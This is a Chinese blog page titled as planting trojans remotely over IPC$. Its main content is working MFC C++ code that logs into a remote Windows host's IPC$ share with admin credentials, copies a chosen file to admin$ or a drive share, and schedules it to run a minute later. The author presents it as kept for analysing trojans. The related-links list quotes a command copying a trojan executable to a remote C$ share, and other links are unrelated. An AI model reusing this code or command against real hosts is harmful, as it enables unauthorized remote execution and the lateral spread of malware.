要实现代码例如以下:

/////////////////////////////////////////////////////////////////////////////////////

typedef struct TagHost

{

CString host;

CString user;

CString pass;

CString filename;

CString LocalFilePath;

CListBox* list;

}IPC;

void CShareDlg::OnStart() //启动线程序

{

  UpdateData(TRUE);

  IPC* ipc = new IPC;

  ipc->host = m_host;

  ipc->user = m_user;

  ipc->pass = m_pass;

  ipc->LocalFilePath = m_localfile;

  ipc->filename = filename;

  ipc->list = &m_list;

  AfxBeginThread(ThreadIpcConnect,ipc);

}

/////////////////////////////线程/////////////////////////////////////////////////////

UINT ThreadIpcConnect(LPVOID lpvoid)

{

  IPC* ipc;

  CListBox* list;

  ipc = (IPC*)lpvoid;

  CString host;

  CString admin;

  CString pass;

  CString filename;

  CString localfilepath;

  host = ipc->host ;

  pass = ipc->pass;

  admin = ipc->user;

  localfilepath = ipc->LocalFilePath;

  filename =ipc->filename ;

list = ipc->list;

  BOOL IpcConnect;

  LPTIME_OF_DAY_INFO TimeBuf=NULL;

  NET_API_STATUS Status;

  CString RemoteFilePath,CmdCom("admin$\");

///////////////////////////////IPC连接////////////////////////////////////////////////////////////////

  NETRESOURCE ns;

  TCHAR buf[MAX_PATH];

  wsprintf(buf,"\\%s\ipc$",host);

  ZeroMemory(&ns,sizeof(ns));

  ns.dwScope=RESOURCE_GLOBALNET;

  ns.dwType=RESOURCETYPE_ANY;

  ns.dwDisplayType=RESOURCEDISPLAYTYPE_GENERIC;

  ns.dwUsage=RESOURCEUSAGE_CONNECTABLE;

  ns.lpLocalName="";

  ns.lpRemoteName=buf;

  ns.lpProvider=NULL;

  ns.lpComment=NULL;

  CString hhost = host;

  IpcConnect =WNetAddConnection2(&ns,pass,admin,0);

///建立IPC连接

  if(IpcConnect)

  {

//连接成功后

///////////////////////////连接成功上传文件//////////////////////////////////////////////////////////

    RemoteFilePath=("\\"+host+"\admin$\"+filename);

    IpcConnect=CopyFile(localfilepath,RemoteFilePath,FALSE);

//拷贝文件到admin$(winnt) 假设复制失败,。向其它共享区复制

      if(!IpcConnect)

        {

          RemoteFilePath=("\\"+host+"\C$\"+filename);

          CmdCom="C:\"+filename;

          IpcConnect=CopyFile(localfilepath,RemoteFilePath,FALSE);

            if(!IpcConnect)

            {

               RemoteFilePath=("\\"+host+"\D$\"+filename);

               CmdCom="D:\"+filename;

               IpcConnect=CopyFile(localfilepath,RemoteFilePath,FALSE);

           if(!IpcConnect)

                  {

                     RemoteFilePath=("\\"+host+"\E$\"+filename);

                     CmdCom="E:\"+filename;

                     IpcConnect=CopyFile(localfilepath,RemoteFilePath,FALSE);

                     if(!IpcConnect)

                       {

                        RemoteFilePath ("\\"+host+"\F$\"+filename);

                        CmdCom = "F:\"+filename;

                     IpcConnect = CopyFile(localfilepath,RemoteFilePath,FALSE);

                       }

                  }

              }

         }

///////////////////////////得到远程主机时间///////////////////////////////////////////////////////////

         if(IpcConnect)

         {//获取远程主机时间

           Status=NetRemoteTOD(host.AllocSysString(),(LPBYTE *)&TimeBuf);

            if(Status==NERR_Success)

            {//活取时间成功

///////////////////////////启动目标文件///////////////////////////////////////////////////////////////

              DWORD day=1,JobTime;

              AT_INFO ai;

              day=day*2;

              ai.Command=CmdCom.AllocSysString();

              ai.DaysOfMonth=day;

              ai.DaysOfWeek=0;

              ai.Flags=JOB_NONINTERACTIVE;

              ai.JobTime=((TimeBuf->tod_hours+(-TimeBuf->tod_timezone)/60)%24)*60*60*1000+(TimeBuf->tod_mins+1)*60*1000;

              Status=NetScheduleJobAdd(hhost.AllocSysString(),(LPBYTE)&ai,&JobTime);

              //启动上传的文件,一分钟后启动

              if(Status==NERR_Success)

              {

                list->AddString(host+"启动成功");

              }

              else

                list->AddString(host+"启动失败");

              }

          else

            {

             list->AddString(host+"获取时间失败");

            }

         }

         else

         {

          list->AddString(host+"拷贝文件失败");

         }

    }

    else

    list->AddString(host+"连接失败");

return TRUE;

}

 

代码来自于互联网而且这些代码不过为了备份。供分析木马病毒的时候使用

远程IPC种植木马的更多相关文章

  1. IPC$横向渗透代码实现

    思路 IPC$横向渗透的方法,也是病毒常用的扩散方法. 1.建立连接 2.复制文件到共享中C$.D$.E$.F$ 3.获取服务器的时间 3.设定计划任务按时间执行 用到的Windows API 建立网 ...

  2. 一个DDOS木马后门病毒的分析

    http://blog.csdn.net/qq1084283172/article/details/49305827 一.样本信息 文件名称:803c617e665ff7e0318386e24df63 ...

  3. 内网IPC$种马的三种方法

    copy muma.exe \\host\c$\windows\temp\foobar.exe ##IPC拷贝木马文件 WMIC远程运行命令 wmic /node:host /user:adminis ...

  4. 使用shutdown命令实现局域网内远程关机、重启整蛊他人

    用法: shutdown [/i | /l | /s | /r | /g | /a | /p | /h | /e | /o] [/hybrid] [/soft] [/f]    [/m \\compu ...

  5. 域渗透:IPC$ 命名管道

    介绍:IPC$(Internet Process Connection) 是共享 " 命名管道 " 的资源,它是为了让进程间通信而开放的命名管道,通过提供可信任的用户名和口令,连接 ...

  6. linux端口详解

    Linux端口总结如下: 0|无效端口,通常用于分析操作系统 1|传输控制协议端口服务多路开关选择器 2|管理实用程序 3|压缩进程 5|远程作业登录 7|回显 9|丢弃 11|在线用户 13|时间 ...

  7. 小白日记21:kali渗透测试之提权(一)--本地提权

    本地提权 简单地说,本地提权漏洞就是说一个本来非常低权限.受限制的用户,可以提升到系统至高无上的权限.权限提升漏洞通常是一种"辅助"性质的漏洞,当黑客已经通过某种手段进入了目标机器 ...

  8. ASP漏洞+SQL注入的入侵方法

    本文就是想对装上了防火墙的主机,进行入侵攻击的大概思路小结一下. 首先当然是用扫描器对这台服务器(以下简称主机A)进行常规的扫描,得到初步的信息.再用nmap -sS IP -P0 -p 139 ,透 ...

  9. port与大全portClose方法

    在网络技术,port(Port)通常,有两种含义:首先,物理意义port,例,ADSL Modem.枢纽.开关.路由器连接其他网络设备的接口,如RJ-45port.SCport等等.第二个是逻辑意义p ...

随机推荐

  1. 深入理解Java并发之synchronized实现原理

    深入理解Java类型信息(Class对象)与反射机制 深入理解Java枚举类型(enum) 深入理解Java注解类型(@Annotation) 深入理解Java类加载器(ClassLoader) 深入 ...

  2. dip和px的相互转化

    /** * 根据手机的分辨率从 dp 的单位 转成为 px(像素) */ public static int dip2px(Context context, float dpValue) { fina ...

  3. modbus.c

    #include <avr/io.h> #include <avr/interrupt.h> #include <util/delay.h> //#include ...

  4. C# 异步编程Task整理(二)异常捕捉

    一.在任务并行库中,如果对任务运行Wait.WaitAny.WaitAll等方法,或者求Result属性,都能捕获到AggregateException异常. 可以将AggregateExceptio ...

  5. 如何打开google,facebok等网站

    用记事本打开 C:\WINDOWS\System32\drivers\etc\hosts 文件,粘贴如下蓝色内容到文件里,然后输入 例如 https://www.google.com   https: ...

  6. verilog语法实例学习(8)

    常用的时序电路介绍 在电平敏感的锁存器时钟信号有效期(高电平)期间,锁存器的状态随着输入信号的变化而变化.有时候,我们需要存储器的状态在一个时钟周期只改变一次,这个时候就用到了触发器.触发器(flip ...

  7. scrapy框架系列 (4) Scrapy Shell

    Scrapy Shell Scrapy终端是一个交互终端,我们可以在未启动spider的情况下尝试及调试代码,也可以用来测试XPath或CSS表达式,查看他们的工作方式,方便我们爬取的网页中提取的数据 ...

  8. Easyui1.3.4+IIS6.0+IE8兼容问题解决

    刚刚学习JQuery Easyui,就遇到了拦路虎,最新版本1.3.4下载下来部署到win2003 + IIS6.0中发现所有demo都不可以渲染,IE8提示错误如下: 详细内容如下: 用户代理: M ...

  9. Permutations leetcode java

    题目: Given a collection of numbers, return all possible permutations. For example, [1,2,3] have the f ...

  10. C# MemCached分布式缓存

    using System; using System.Collections.Generic; using System.Text; using Memcached.ClientLibrary; us ...